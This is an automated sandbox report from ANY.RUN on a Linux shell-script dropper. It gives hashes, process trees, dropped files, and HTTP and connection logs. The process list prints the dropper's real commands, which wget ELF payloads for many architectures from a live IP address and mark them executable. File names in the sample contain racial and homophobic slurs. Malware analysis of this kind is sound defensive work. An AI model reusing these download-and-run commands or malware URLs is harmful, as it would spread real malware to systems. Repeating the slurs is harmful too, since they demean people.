Malware analysis /nigga.sh Malicious activity | ANY.RUN

Add for printing

download:	/nigga.sh
Full analysis:	https://app.any.run/tasks/23d78711-8af0-4a5a-95df-0f3a51860926
Verdict:	Malicious activity
Analysis date:	February 11, 2024, 11:44:44
OS:	Ubuntu 22.04.2
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	02CA458377F0CD5C8CEA667446F7395A
SHA1:	C6C9E71F172390FCB9F27532722CDC03B066B16F
SHA256:	F38AF6A22BB7031F7CA1534199A3D055E5C8BCE226604C2A24E7A1FAE7864CFC
SSDEEP:	24:U95xi9SfNq7PE7mRmi0FIXNNIeGFUiF7qXXoNZULKaXKE5ZL:Uw9Slq7PEqRmiZx6VxqXXoNiLKaXKE7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 7935)
- Executes commands using command-line interpreter
  - sudo (PID: 7938)
- Uses wget to download content
  - bash (PID: 7939)
INFO
- Manipulating modules (likely to execute programs on system boot)
  - modprobe (PID: 7948)
  - modprobe (PID: 7944)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

281

Monitored processes

63

Malicious processes

0

Suspicious processes

0

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
7934	/bin/sh -c "sudo chown user \"/tmp/nigga\.sh\" && chmod +x \"/tmp/nigga\.sh\" && DISPLAY=:0 sudo -iu user \"/tmp/nigga\.sh\" "	/bin/sh	—	any-guest-agent
User: user Integrity Level: UNKNOWN Exit code: 7953
7935	sudo chown user /tmp/nigga.sh	/usr/bin/sudo	—	sh
User: user Integrity Level: UNKNOWN Exit code: 0
7936	chown user /tmp/nigga.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
7937	chmod +x /tmp/nigga.sh	/usr/bin/chmod	—	sh
User: user Integrity Level: UNKNOWN Exit code: 0
7938	sudo -iu user /tmp/nigga.sh	/usr/bin/sudo	—	sh
User: user Integrity Level: UNKNOWN Exit code: 7953
7939	-bash --login -c \/tmp\/nigga\.sh	/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 7953
7940	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
7941	wget -O lol http://192.3.152.183/mips	/usr/bin/wget	—	bash
User: user Integrity Level: UNKNOWN Exit code: 1
7942	chmod +x lol	/usr/bin/chmod	—	bash
User: user Integrity Level: UNKNOWN Exit code: 496
7943	-bash --login -c \/tmp\/nigga\.sh	/usr/bin/bash	—	bash
User: user Integrity Level: UNKNOWN Exit code: 7939

Add for printing

Executable files

0

Suspicious files

0

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
7941	wget	/tmp/lol		—
		MD5:—	SHA256:—
7945	wget	/tmp/lmao		—
		MD5:—	SHA256:—
7949	wget	/tmp/faggot		—
		MD5:—	SHA256:—
7956	wget	/tmp/gay		—
		MD5:—	SHA256:—
7961	wget	/tmp/retard		—
		MD5:—	SHA256:—
7965	wget	/tmp/nigger		—
		MD5:—	SHA256:—
7969	wget	/tmp/shit		—
		MD5:—	SHA256:—
7973	wget	/tmp/nigga		—
		MD5:—	SHA256:—
7977	wget	/tmp/kekw		—
		MD5:—	SHA256:—
7981	wget	/tmp/what		—
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

14

TCP/UDP connections

34

DNS requests

7

Threats

13

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	185.125.190.18:80	http://connectivity-check.ubuntu.com/	unknown	—	—	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/mips	unknown	binary	34.1 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/x86_64	unknown	binary	33.6 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/arm	unknown	binary	32.9 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/mpsl	unknown	binary	35.2 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/arm5	unknown	binary	31.4 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/arm7	unknown	binary	58.0 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/arm6	unknown	binary	36.8 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/powerpc	unknown	binary	31.3 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/i686	unknown	binary	32.0 Kb	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	185.125.190.18:80	—	Canonical Group Limited	GB	unknown
—	—	185.125.190.48:80	—	Canonical Group Limited	GB	unknown
—	—	185.125.190.98:80	—	Canonical Group Limited	GB	unknown
—	—	195.181.175.41:443	—	Datacamp Limited	DE	unknown
—	—	224.0.0.251:5353	—	—	—	unknown
—	—	192.3.152.183:80	—	AS-COLOCROSSING	US	unknown
—	—	45.155.91.135:21425	—	—	PH	unknown
—	—	45.155.91.135:3632	—	—	PH	unknown
—	—	156.146.33.140:443	—	Datacamp Limited	DE	unknown
—	—	185.125.188.55:443	api.snapcraft.io	Canonical Group Limited	GB	unknown

DNS requests

Domain	IP	Reputation
224.100.168.192.in-addr.arpa	—	unknown
api.snapcraft.io	185.125.188.55 185.125.188.54 185.125.188.59 185.125.188.58	unknown
connectivity-check.ubuntu.com	2001:67c:1562::24 2001:67c:1562::23 2620:2d:4002:1::198 2620:2d:4000:1::97 2620:2d:4002:1::196 2620:2d:4000:1::2b 2620:2d:4000:1::23 2620:2d:4000:1::22 2620:2d:4000:1::2a 2620:2d:4002:1::197 2620:2d:4000:1::96 2620:2d:4000:1::98	unknown

Threats

PID	Process	Class	Message
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

/nigga.sh

02CA458377F0CD5C8CEA667446F7395A

C6C9E71F172390FCB9F27532722CDC03B066B16F

F38AF6A22BB7031F7CA1534199A3D055E5C8BCE226604C2A24E7A1FAE7864CFC

24:U95xi9SfNq7PE7mRmi0FIXNNIeGFUiF7qXXoNZULKaXKE5ZL:Uw9Slq7PEqRmiZx6VxqXXoNiLKaXKE7

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

SUSPICIOUS

Modifies file or directory owner

Executes commands using command-line interpreter

Uses wget to download content

INFO

Manipulating modules (likely to execute programs on system boot)

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings